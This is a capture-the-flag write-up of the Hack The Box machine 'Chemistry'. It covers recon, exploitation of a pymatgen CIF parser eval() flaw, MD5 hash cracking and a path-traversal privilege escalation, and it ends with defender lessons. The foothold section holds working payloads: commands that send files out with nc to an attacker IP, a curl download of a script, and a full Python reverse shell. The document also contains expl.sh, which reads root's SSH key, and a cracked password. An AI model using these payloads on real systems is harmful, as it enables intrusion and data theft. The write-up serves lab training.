Chemistry
2024-10-24
INTRODUCTION
Chemistry was released as the penultimate box of HTB’s season 6, Heist. It’s about breaking into a custom service for analyzing a scientific data file. Maybe you’ve seen tools like this before, where some expert in a non-tech field knows just enough coding to solve a problem for themselves? It’s admirable that people do this type of thing, but these tools are often doomed by poor security - as we’ll see in this box.
Foothold is 99% of Chemistry. Unless you’re incredibly clever, it requires a little bit of research to discover a particular vulnerability disclosure, and utilize the PoC that the disclosure provides. The exploit from the PoC is quite limited, however, and will require careful usage to actually gain us a shell. Thankfully, if you build up to your foothold in a series of small steps, it should be relatively easy.
Unlike many “Easy” boxes, there is actually a small escalation from the service account that you use for foothold, to a low-privilege human user. Some very simple local enumeration will uncover a database, and inside are hashes that are trivial to crack - one of them leads to the next user.
Privilege escalation to root is… almost not even worth mentioning 😂 Just look through the filesystem for a suspicious script and run it.
RECON
nmap scans
Port scan
For this box, I’m running my typical enumeration strategy. I set up a directory for the box, with an nmap subdirectory. Then I set $RADDR to the target machine’s IP, and scanned it with a simple but broad port scan:
sudo nmap -p- -O --min-rate 1000 -oN nmap/port-scan-tcp.txt $RADDR
PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
No web server, eh? That’s interesting!
Script scan
To investigate a little further, I ran a script scan over the TCP ports I just found:
TCPPORTS=`grep "^[0-9]\+/tcp" nmap/port-scan-tcp.txt | sed 's/^\([0-9]\+\)\/tcp.*/\1/g' | tr '\n' ',' | sed 's/,$//g'`
sudo nmap -sV -sC -n -Pn -p$TCPPORTS -oN nmap/script-scan-tcp.txt $RADDR
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.11 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 f1:ae:1c:3e:1d:ea:55:44:6c:2f:f2:56:8d:62:3c:2b (ECDSA)
|_ 256 94:42:1b:78:f2:51:87:07:3e:97:26:c9:a2:5c:0a:26 (ED25519)
5000/tcp open upnp?
| fingerprint-strings:
| GetRequest:
| HTTP/1.1 200 OK
| Server: Werkzeug/3.0.3 Python/3.9.5
| Date: Thu, 24 Oct 2024 04:38:29 GMT
| Content-Type: text/html; charset=utf-8
| Content-Length: 719
| Vary: Cookie
| Connection: close
| <!DOCTYPE html>
| <html lang="en">
| <head>
| <meta charset="UTF-8">
| <meta name="viewport" content="width=device-width, initial-scale=1.0">
| <title>Chemistry - Home</title>
| <link rel="stylesheet" href="/static/styles.css">
| </head>
| <body>
| <div class="container">
| class="title">Chemistry CIF Analyzer</h1>
| <p>Welcome to the Chemistry CIF Analyzer. This tool allows you to upload a CIF (Crystallographic Information File) and analyze the structural data contained within.</p>
| <div class="buttons">
| <center><a href="/login" class="btn">Login</a>
| href="/register" class="btn">Register</a></center>
| </div>
| </div>
| </body>
| RTSPRequest:
| <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
| "http://www.w3.org/TR/html4/strict.dtd">
| <html>
| <head>
| <meta http-equiv="Content-Type" content="text/html;charset=utf-8">
| <title>Error response</title>
| </head>
| <body>
| <h1>Error response</h1>
| <p>Error code: 400</p>
| <p>Message: Bad request version ('RTSP/1.0').</p>
| <p>Error code explanation: HTTPStatus.BAD_REQUEST - Bad request syntax or unsupported method.</p>
| </body>
|_ </html>
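The TCPPORTS one-liner used for the script scan is a bit dense, so here is a minimal Python sketch of the same idea: pull every port number from lines that start with digits followed by /tcp, then join them with commas. The function name and the sample text are my own illustration, not part of any tool.

```python
import re

def open_tcp_ports(nmap_output: str) -> str:
    """Collect ports from lines like '22/tcp open ssh' into 'p1,p2,...'."""
    # Same pattern the grep/sed pipeline relies on: digits at line start, then /tcp
    ports = re.findall(r"^(\d+)/tcp", nmap_output, flags=re.MULTILINE)
    return ",".join(ports)

# Sample text mirroring the port scan result shown earlier
sample = """PORT STATE SERVICE
22/tcp open ssh
5000/tcp open upnp
"""
print(open_tcp_ports(sample))
```

Like the shell version, this matches on the line prefix only, so it does not distinguish open ports from filtered ones.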
Vuln scan
Now that we know what services might be running, I’ll do a vulnerability scan:
sudo nmap -n -Pn -p$TCPPORTS -oN nmap/vuln-scan-tcp.txt --script 'safe and vuln' $RADDR
No additional info from the vuln scan
UDP scan
To be thorough, I also did a scan over the common UDP ports:
sudo nmap -sUV -T4 -F --version-intensity 0 -oN nmap/port-scan-udp.txt $RADDR
No results from the UDP scan
Webserver Strategy
Nmap didn’t show any redirect for port 5000, but for convenience I’ll add an entry to /etc/hosts and do banner grabbing on that domain:
DOMAIN=chemistry.htb
echo "$RADDR $DOMAIN" | sudo tee -a /etc/hosts
whatweb --aggression 3 http://$DOMAIN:5000 && curl -IL http://$RADDR:5000
That’s a slightly old version of Python, but a current version of Werkzeug.
Next I’ll perform vhost and subdomain enumeration. First, I’ll check for alternate hosts:
WLIST="/usr/share/seclists/Discovery/DNS/bitquark-subdomains-top100000.txt"
ffuf -w $WLIST -u http://$RADDR:5000/ -H "Host: FUZZ.htb" -c -t 60 -o fuzzing/vhost-root.md -of md -timeout 4 -ic -ac -v
None were found. But frankly, we weren’t expecting any against a Python + Werkzeug ( + Flask probably) webserver; they don’t usually define vhosts.
Next I’ll check for subdomains of chemistry.htb:
ffuf -w $WLIST -u http://$RADDR:5000/ -H "Host: FUZZ.$DOMAIN" -c -t 60 -o fuzzing/vhost-$DOMAIN.md -of md -timeout 4 -ic -ac -v
No new results from that. I’ll move on to directory enumeration on http://chemistry.htb:5000.
First, directory enumeration:
I prefer to not run a recursive scan, so that it doesn’t get hung up on enumerating CSS and images.
WLIST=/usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-small.txt
ffuf -w $WLIST:FUZZ -u http://$DOMAIN:5000/FUZZ -t 60 -ic -c -o fuzzing/ffuf-directories-root -of json -timeout 4
Using ZAP to quickly spider the site, we get results that also indicate the POST parameters:
Exploring the Website
The landing page is very simple, allowing us only to register or login. After logging in, we should be redirected to the Dashboard.
To try it out, I’ll register a user:
The Dashboard allows us to upload .CIF files. Thankfully, they provide an example file at /static/example.cif:
Downloading the example file, we can see that there’s basically no file metadata, just some stuff that probably gets parsed in Python. Notably, they’re using a custom Content-Type header:
HTTP/1.1 200 OK
Server: Werkzeug/3.0.3 Python/3.9.5
Date: Thu, 24 Oct 2024 05:43:11 GMT
Content-Disposition: inline; filename=example.cif
Content-Type: chemical/x-cif
Content-Length: 376
Last-Modified: Wed, 09 Oct 2024 20:13:53 GMT
Cache-Control: no-cache
ETag: "1728504833.9929953-376-2511866491"
Date: Thu, 24 Oct 2024 05:43:11 GMT
Connection: close
data_Example
_cell_length_a 10.00000
_cell_length_b 10.00000
_cell_length_c 10.00000
_cell_angle_alpha 90.00000
_cell_angle_beta 90.00000
_cell_angle_gamma 90.00000
_symmetry_space_group_name_H-M 'P 1'
loop_
_atom_site_label
_atom_site_fract_x
_atom_site_fract_y
_atom_site_fract_z
_atom_site_occupancy
H 0.00000 0.00000 0.00000 1
O 0.50000 0.50000 0.50000 1
After uploading the example.cif file, we can see an entry on the dashboard. It has uploaded to a file with a random filename, but the entry on the dashboard shows the filename we provided:
When we view the structure from example.cif that we just uploaded, we can see a couple of calculated values, volume and density. It’s probably a fair assumption that volume is simply a * b * c, but density looks more complicated:
☝️ Regardless of how they’re calculated, what’s important is that we have calculated values that are being rendered based on user-controllable inputs.
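For the curious, here is a rough sketch of how such values are conventionally derived from the fields in example.cif. This uses the textbook unit-cell formulas; I have not confirmed that the application computes them this way, and the constants and function names are my own.

```python
import math

AMU_TO_GRAMS = 1.66053906660e-24         # one atomic mass unit, in grams
ANGSTROM3_TO_CM3 = 1e-24                 # one cubic angstrom, in cubic centimetres
ATOMIC_MASS = {"H": 1.008, "O": 15.999}  # standard atomic weights (amu)

def cell_volume(a, b, c, alpha, beta, gamma):
    """General (triclinic) unit-cell volume in cubic angstroms; angles in degrees."""
    ca, cb, cg = (math.cos(math.radians(x)) for x in (alpha, beta, gamma))
    return a * b * c * math.sqrt(1 - ca**2 - cb**2 - cg**2 + 2 * ca * cb * cg)

def cell_density(volume_a3, atoms):
    """Density in g/cm^3 from a list of (element, occupancy) pairs in one cell."""
    mass_g = sum(ATOMIC_MASS[el] * occ for el, occ in atoms) * AMU_TO_GRAMS
    return mass_g / (volume_a3 * ANGSTROM3_TO_CM3)

# Values taken from example.cif: a 10 x 10 x 10 cell with right angles, one H and one O
volume = cell_volume(10, 10, 10, 90, 90, 90)
density = cell_density(volume, [("H", 1), ("O", 1)])
print(f"volume={volume:.2f} A^3, density={density:.5f} g/cm^3")
```

With all three angles at 90 degrees the square-root term collapses to 1, which is why a * b * c is a fair guess for this particular file.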
So far, I see a few things we might be able to attack:
- The filename. We might be able to do a stored XSS via this parameter, but it’s unclear if that would gain us anything.
- The calculated values Volume and Density: maybe we can find a way to sneak code into one of the user-controllable parameters, and gain RCE this way?
FOOTHOLD
Playing with the CIF File
At first, I tried to execute python code written into the variables of the CIF file. I placed simple statements into all kinds of different positions of the CIF file, very similar to how you’d test for SSTI…
My only findings were that I could use arbitrary text for the elements in the _atom_site_occupancy data, and that portions of the string would be reflected onto the page. We can change the dimensions of the crystal, but can’t seem to inject commands into those values.
In hopes of traversing the imported modules within the server’s python instance, I tried these payloads in various positions, too. If any of these were successful, we could build somewhat of a “gadget chain” in hopes of accessing something useful like os or subprocess:
[].__class__.__base__.__subclasses__()
''.__class__.mro()[1].__subclasses__()
''.__class__.__mro__[2].__subclasses__()
self.__init__.__globals__.__builtins__
No luck with any of those!
Vulnerability Research
🔍 Since my attempts at injecting code into the CIF file were unsuccessful, I started some web searching for known vulnerabilities in this file format. Eventually, I found this security advisory in the https://github.com/materialsproject/pymatgen Github repo, which documents a PoC for exploiting the parser for this file format:
data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("touch pwned");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
The PoC executes a simple touch pwned command.
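The expression inside the PoC is easier to follow when unrolled. Below is a harmless sketch of the first half of the chain only: it walks from an empty tuple to object, lists object's subclasses, and picks out BuiltinImporter by name. It deliberately stops before the load_module and system calls that the real payload makes. The variable names are mine.

```python
# Step 1: () is a tuple, and tuple's MRO is (tuple, object), so index 1 is `object`.
base = ().__class__.__mro__[1]

# Step 2: the PoC assembles the attribute name from two pieces, so the literal
# text "__subclasses__" never appears in the payload, then fetches and calls it.
attr_name = "__sub" + "classes__"
subclasses = base.__getattribute__(*[base] + [attr_name])()

# Step 3: filter the subclasses of object by name to find the importer class.
importers = [cls for cls in subclasses if cls.__name__ == "BuiltinImporter"]

print(base)
print(len(subclasses), "subclasses of object")
print(importers)
```

From there, the PoC uses the importer to obtain the os module and call system(), all without writing an import statement.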
Testing the PoC
Clearly, this is a blind attack - there is no reflected info to the website. Therefore, to test if it works, I’ll use a payload that doesn’t rely on reflected values:
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("sleep 3");0,0,0'
I also did this with sleep 1, uploading two files.
It seems like, when I View each of the files, the sleep command actually executes. Here are the two requests to view each file:
We can see that they take 0.19s plus whatever sleep delay was added!
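The reasoning behind this timing test can be written down as a tiny check: subtract the baseline from the observed response time, and see whether the remainder matches the injected delay. This is only a sketch; the function name, the tolerance, and the observed times in the example (baseline plus delay) are illustrative assumptions rather than exact measurements.

```python
def injected_sleep_ran(baseline_s, observed_s, sleep_s, tolerance_s=0.25):
    """True if the extra response time is close to the injected sleep duration."""
    extra = observed_s - baseline_s
    return abs(extra - sleep_s) <= tolerance_s

BASELINE = 0.19  # seconds, the baseline noted above

# Illustrative observations: baseline + 1s and baseline + 3s
print(injected_sleep_ran(BASELINE, 1.19, sleep_s=1))
print(injected_sleep_ran(BASELINE, 3.19, sleep_s=3))
# A response that comes back at roughly baseline speed means the sleep never ran
print(injected_sleep_ran(BASELINE, 0.21, sleep_s=3))
```

Using two different delays is what makes the test convincing: one slow response could be network jitter, but two responses that each track their own delay are hard to explain any other way.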
Extend the PoC
Since this foothold will be blind, it might be useful to know whether or not cURL is on the target.
I started up an instance of my typical HTTP server on port 8000. Check it out at my github repo if you want to use it too. I’m using it here because it’ll automatically convert base64 data, and because it stays alive after more than one connection.
I’ve also opened up port 8000 using ufw.
Let’s check for cURL using this payload:
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("curl http://10.10.14.17:8000/success");0,0,0'
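Since every test means uploading a fresh .cif file with a different command, it helps to template the PoC. Here is a minimal sketch that drops a command into the advisory's file layout as reproduced above. The build_cif helper is hypothetical (my own naming), and it refuses quotes and newlines because they would break out of the quoted strings in the payload.

```python
CIF_TEMPLATE = """data_5yOhtAoR
_audit_creation_date 2018-06-08
_audit_creation_method "Pymatgen CIF Parser Arbitrary Code Execution Exploit"
loop_
_parent_propagation_vector.id
_parent_propagation_vector.kxkykz
k1 [0 0 0]
_space_group_magn.transform_BNS_Pp_abc 'a,b,[d for d in ().__class__.__mro__[1].__getattribute__ ( *[().__class__.__mro__[1]]+["__sub" + "classes__"]) () if d.__name__ == "BuiltinImporter"][0].load_module ("os").system ("{command}");0,0,0'
_space_group_magn.number_BNS 62.448
_space_group_magn.name_BNS "P n' m a' "
"""

def build_cif(command: str) -> str:
    """Return the PoC file contents with `command` placed in the system() call."""
    # Quotes would terminate the Python string or the CIF value early
    forbidden = {'"', "'", "\n"}
    if any(ch in command for ch in forbidden):
        raise ValueError("command must not contain quotes or newlines")
    return CIF_TEMPLATE.format(command=command)

print(build_cif("sleep 3"))
```

The quoting restriction fits what I saw in practice: simple commands, pipes, and redirects go through fine, while anything needing nested quotes is a headache.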
I was having a lot of trouble getting any subshells to work within the payload, so I checked what was available using which combined with nc:
which nc curl wget base64 sh bash ash python python3 | nc 10.10.14.17 53
Aha! So base64 and bash are not even on the target. That explains the failure of several of my attempts to exfiltrate any data…
Regardless, I’m not having any luck at all forming a reverse shell. Maybe I’ll try to learn more about the target, using this nc channel that has proven reliable.
Let’s do some basic enumeration:
id | nc 10.10.14.17 53
# uid=1001(app) gid=1001(app) groups=1001(app)
⚠️ Through a little bit of testing, I’m finding that it doesn’t work with subshells. Pipes seem to work perfectly fine though.
Alright, that makes sense. Let’s see if we can read the environment as a file:
nc 10.10.14.17 53 < /proc/self/environ
# LANG=en_US.UTF-8PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binHOME=/home/appLOGNAME=appUSER=appSHELL=/bin/bashINVOCATION_ID=24986dcd0cb74fbdbd9049da93c48384JOURNAL_STREAM=9:38060WERKZEUG_SERVER_FD=4
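The output above runs together because procfs exposes a process's environment as KEY=value entries separated by NUL bytes, which a terminal does not display. A short sketch of splitting such a dump back into a dictionary follows; the function name is mine, and the sample bytes reuse a few of the values shown above.

```python
def parse_environ(raw: bytes) -> dict:
    """Split a NUL-separated environment dump into a {name: value} dict."""
    env = {}
    for entry in raw.split(b"\0"):
        if not entry:
            continue  # skip the empty chunk after the trailing NUL
        key, _, value = entry.decode("utf-8", errors="replace").partition("=")
        env[key] = value
    return env

# A few entries from the dump above, with the NUL separators restored
raw_dump = b"LANG=en_US.UTF-8\0HOME=/home/app\0LOGNAME=app\0USER=app\0SHELL=/bin/bash\0"
for name, value in parse_environ(raw_dump).items():
    print(f"{name} = {value}")
```

If you save the raw nc output to a file, reading it in binary mode and passing the bytes to this function gives a much more readable listing.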
Ohh interesting - this user has a home directory. Let’s list the contents:
ls -laR /home/app | nc 10.10.14.17 53
This produced a lot of results, but here are the notable parts:
USER FLAG
Planting an SSH Key
🚫 This didn’t actually work. I’m still not quite sure why. If you’re short on time, skip ahead to the next section.
Since we know the app user has a home directory, maybe we can simply plant an SSH key to get a shell? First, I’ll need to generate a keypair:
ssh-keygen -t rsa -b 4096 -f app_id_rsa -N "p3lican"
cp app_id_rsa.pub ../www # Copy the pubkey over to the directory our http server is serving
Now let’s attempt to make an SSH directory and plant the pubkey. Here are the payloads:
mkdir /home/app/.ssh
curl http://10.10.14.17:8000/app_id_rsa.pub -o /home/app/.ssh/id_rsa.pub
I ran an extra payload to check that the pubkey landed where it should have (it did), so now we’re ready to connect over SSH:
ssh -i ./app_id_rsa app@$RADDR
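Huh? Why isn’t it accepting key-based authentication? Is it explicitly disabled or something? The permissions on both files of the keypair are correct. (One likely culprit, in hindsight: sshd looks for authorized public keys in ~/.ssh/authorized_keys, whereas the payload above saved the key as id_rsa.pub.)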
Oh well, may as well try something else… 😔
Python Reverse Shell
Since we’ve already demonstrated we can write files using cURL, and that python3 is present on the target, why not simply download a python script and run it as a reverse shell?
My attempts to form a python reverse shell didn’t work (using the payload from earlier). But those attempts were subject to whatever limitations the exploit had - and we already know that it didn’t accommodate subshells. Maybe we’ll have better luck running the reverse shell as a script?
First, I’ll prepare revshell.py in my www directory, the directory that my http server is serving:
#!/usr/bin/python3
import socket,subprocess,os
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.17",53))
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
import pty
pty.spawn("sh")
Next I’ll start up a reverse shell listener:
sudo ufw allow from $RADDR to any port 53 proto tcp
bash
sudo su
rlwrap nc -lvnp 53
Now I’ll prepare another two .cif files - one with a payload to download the reverse shell, and another with a payload to run it:
curl http://10.10.14.17:8000/revshell.py -o /home/app/revshell.py
python3 /home/app/revshell.py
Running both of those, we finally see a reverse shell open:
database.db
Now that we have a stable reverse shell, and don’t need to worry about the limitations of the exploit, let’s exfil that database we found:
Now, from the attacker host, we can open it up and see what we’ve found:
SQLite version 3.46.0 2024-05-23 13:25:27
Enter ".help" for usage hints.
sqlite> .schema
CREATE TABLE structure (
id INTEGER NOT NULL,
user_id INTEGER NOT NULL,
filename VARCHAR(150) NOT NULL,
identifier VARCHAR(100) NOT NULL,
PRIMARY KEY (id),
FOREIGN KEY(user_id) REFERENCES user (id),
UNIQUE (identifier)
);
CREATE TABLE user (
id INTEGER NOT NULL,
username VARCHAR(150) NOT NULL,
password VARCHAR(150) NOT NULL,
PRIMARY KEY (id),
UNIQUE (username)
);
The user table looks like it has password hashes. I’ll put them in a nice format and extract them:
.mode csv
.separator :
select username,password from user;
Lucky us - those look like MD5 hashes! They should be trivial to crack 👍
The list of users also contains rosa, who is the other user with a home directory on this box.
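To show why unsalted MD5 is so weak, here is a minimal sketch of a dictionary attack: hash each candidate word once and look it up among the target hashes. The demo user, password, and three-word list are invented for illustration and are not from the box's database. The looks_like_md5 helper only checks the shape (32 hex characters), which other algorithms can share.

```python
import hashlib
import re

def looks_like_md5(value: str) -> bool:
    """Shape check only: 32 hex characters is consistent with a raw MD5 digest."""
    return re.fullmatch(r"[0-9a-fA-F]{32}", value) is not None

def dictionary_attack(user_hashes: dict, candidates) -> dict:
    """Map each username to its recovered password, where a candidate matches."""
    by_hash = {}
    for user, digest in user_hashes.items():
        by_hash.setdefault(digest.lower(), []).append(user)
    cracked = {}
    for word in candidates:
        digest = hashlib.md5(word.encode()).hexdigest()
        for user in by_hash.get(digest, []):
            cracked[user] = word
    return cracked

# Hypothetical data: one made-up user whose password is in the wordlist
demo_hashes = {"demo_user": hashlib.md5(b"letmein").hexdigest()}
wordlist = ["123456", "password", "letmein"]
print(dictionary_attack(demo_hashes, wordlist))
```

Because there is no salt, each candidate only needs to be hashed once to be tested against every user at the same time, and MD5 itself is extremely fast to compute.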
Password Cracking
I’ve copy-pasted those hashes (with the usernames) into database.hash. Under the assumption that they’re regular MD5 hashes, I’ll run hashcat over them:
hashcat -m 0 --username database.hash /usr/share/wordlists/rockyou.txt
Seconds later, we have several results - including rosa:
The important credential is rosa : unicorniorosados. With any luck, this password will have been re-used for the local rosa account:
ssh rosa@$RADDR # unicorniorosados
Excellent - we now have an SSH connection as rosa. The user flag is in /home/rosa, so go read it for some points:
cat /home/rosa/user.txt
ROOT FLAG
Local Enumeration - rosa
A quick check of netstat shows there is another process, listening locally on port 8080:
Cross-referencing this with ps aux, we can be reasonably sure that this is the process running from /opt/monitoring_site/app.py:
root is running the server, and only root can access that directory. Let’s forward the port and check it out.
Since I already have an SSH connection, the easiest way to forward the port is simply using ssh -L:
ssh -L 8080:localhost:8080 rosa@$RADDR
Now we should be able to access that port on localhost:
Monitoring Site
🚫 This section didn’t lead towards privilege escalation. If you’re short on time, skip to the next section.
Checking out the site
The monitoring site looks like it was made quite hastily, possibly hinting that this is something we should attack? The Start Service, Stop Service, and Check Attacks buttons in the navbar seem like they’re unimplemented - clicking any of them shows a message that the feature is not available.
The graphs on the Home page are completely static, so the only functionality that is actually implemented here is under List Services. Here’s the javascript connected to that button:
$('#list-services').click(function() {
$('.container > div').hide();
$('#service-list').show();
$('#attack-logs').hide();
// Get list of services
$('.loader').show();
$.get('/list_services', function(data) {
$('.loader').hide();
var runningServices = [];
var stoppedServices = [];
// Separate running and stopped services
// ...
// Show running services
// ...
// Show stopped services
// ...
});
});
In short, it makes a GET request to /list_services, then parses the results. Here’s what that endpoint looks like:
That’s interesting, but I don’t really see anything out of the ordinary.
Enumerating the API
Since there are unimplemented features in the frontend, there’s a possibility that the developer created the backend first and just hasn’t got around to finishing the frontend. We already know about GET /list_services; are there more?
Thankfully, Seclists has a good wordlist for enumerating APIs:
WLIST=/usr/share/seclists/Discovery/Web-Content/api/api-endpoints-res.txt
ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -t 60 -ic -c -timeout 4 -mc all -fc 404
ffuf -w $WLIST:FUZZ -u http://localhost:8080/FUZZ -X POST -t 60 -ic -c -timeout 4 -mc all -fc 404
There weren’t any significant results. If I get stuck, I might return to enumerating the API more - for now, I’ll move on to something else.
Continuing local enumeration
As I was downloading my toolbox into /tmp (to get a copy of pspy), I noticed something very odd sitting there:
The contents of expl.sh:
#!/bin/bash
url="http://localhost:8080"
string="../"
payload="/assets/"
file="root/.ssh/id_rsa" # without the first /
for ((i=0; i<15; i++)); do
payload+="$string"
echo "[+] Testing with $payload$file"
status_code=$(curl --path-as-is -s -o /dev/null -w "%{http_code}" "$url$payload$file")
echo -e "\tStatus code --> $status_code"
if [[ $status_code -eq 200 ]]; then
curl -s --path-as-is "$url$payload$file"
break
fi
done
😏 Rosa… what have you been up to?
The above script is a pre-written exploit for the monitoring_site server. It applies a very simple path traversal to obtain the id_rsa key for root.
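To make the script's loop concrete, here is a small sketch that generates the same sequence of candidate paths, then shows what each one collapses to if the dot segments get resolved. That second part is why the script passes --path-as-is to curl: without it, curl would squash the /../ sequences before sending the request. The function name and defaults are mine, mirroring the variables in expl.sh.

```python
import posixpath

def traversal_candidates(prefix="/assets/", target="root/.ssh/id_rsa", max_depth=15):
    """Build the paths the script tries: prefix + N copies of '../' + target."""
    return [prefix + "../" * depth + target for depth in range(1, max_depth + 1)]

candidates = traversal_candidates()
for path in candidates[:3]:
    # normpath stands in for what a normalising client or server would do
    print(path, "->", posixpath.normpath(path))
```

Every candidate resolves to the same absolute path once normalised, so the only question the loop answers is how many ../ segments the server needs before it escapes its assets directory.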
So what are we waiting for? Let’s run it!
😂 Yep, that’s right - rosa has been doing their own privesc work. Lucky us, eh? The script works flawlessly and dumps the SSH private key for root.
All we need to do is paste it into a file and fix the permissions on it:
vim loot/root_id_rsa # [paste the key]
chmod 600 loot/root_id_rsa
ssh -i loot/root_id_rsa root@$RADDR
cat /root/root.txt
Wow - privesc was ridiculously easy!
CLEANUP
Target
I’ll get rid of the spot where I place my tools, /tmp/.Tools:
rm -rf /tmp/.Tools
Attacker
There’s also a little cleanup to do on my local / attacker machine. It’s a good idea to get rid of any “loot” and source code I collected that didn’t end up being useful, just to save disk space:
rm loot/database.db
It’s also good policy to get rid of any extraneous firewall rules I may have defined. This one-liner just deletes all the ufw rules:
NUM_RULES=$(($(sudo ufw status numbered | wc -l)-5)); for (( i=0; i<$NUM_RULES; i++ )); do sudo ufw --force delete 1; done; sudo ufw status numbered;
LESSONS LEARNED

Attacker
🗺️ Don’t get too fixated on a certain route to RCE. On this box, I feel like I wasted a lot of time during foothold trying to test and understand the limitations of the CIF file exploit. If I could go back and do it again, I would have adjusted my approach as soon as I found a single working command like nc.
👣 Related to the above point, break your ideas up into small, testable steps. In the end, it will save a lot of time because you won’t be checking and re-checking your assumptions over and over. Form a hypothesis, figure out a way to test it, prove it to yourself, then add it to your big bag of knowledge and keep moving forward.

Defender
💉 Beware niche libraries that might not practice secure coding. I’m sure the creators of the .CIF file interaction libraries were exceptionally good scientists, but nobody is an expert in everything… They followed very sloppy coding practices, using an eval() call to parse user-controllable inputs, leading to our ability to inject commands. The lesson here is mostly to monitor the health of open-source projects: for maximum security, we need active contribution from a good balance of people, with a wide variety of skillsets.
#️⃣ Hash passwords properly. Give some consideration to password hashing. In the end, the best password hashing balances the ease of legitimate password verification and difficulty of illicit password cracking. This box used unsalted MD5 for hashing passwords, which is laughably easy to crack (you can even just toss them into Crackstation.net). Better modern approaches would have been using bcrypt (with sufficient difficulty), or using PBKDF2 with HMAC-SHA-512 (also with sufficient difficulty). Check out the guidelines by OWASP for more info.
✋ Permissions are only as useful as the most permissive thing a service has access to. On this box, we escalated privilege by using a very simple path traversal - so why was the monitoring_site able to access root’s SSH key? This server should have been run as a service account, with limited permissions. Heck, even rosa had sufficient permissions to list the running services (service --status-all), so why was it granted root?
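As a concrete take on the password hashing point, here is a minimal sketch of salted PBKDF2 with HMAC-SHA-512 using only Python's standard library. The iteration count is an assumption on my part, chosen to be in line with what I understand OWASP's guidance to be; check the current recommendation before relying on it. The function names are mine.

```python
import hashlib
import hmac
import os

ITERATIONS = 210_000  # assumption: verify against current OWASP guidance

def hash_password(password, salt=None):
    """Return (salt, digest) using PBKDF2-HMAC-SHA512 with a per-user random salt."""
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha512", password.encode(), salt, ITERATIONS)
    return salt, digest

def verify_password(password, salt, expected_digest):
    """Recompute the digest with the stored salt and compare in constant time."""
    _, digest = hash_password(password, salt)
    return hmac.compare_digest(digest, expected_digest)

salt, stored = hash_password("correct horse battery staple")
print(verify_password("correct horse battery staple", salt, stored))
print(verify_password("wrong guess", salt, stored))
```

The per-user salt means identical passwords no longer produce identical hashes, and the iteration count makes each guess far more expensive for an attacker than a single MD5 computation.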
Thanks for reading
🤝🤝🤝🤝
@4wayhandshake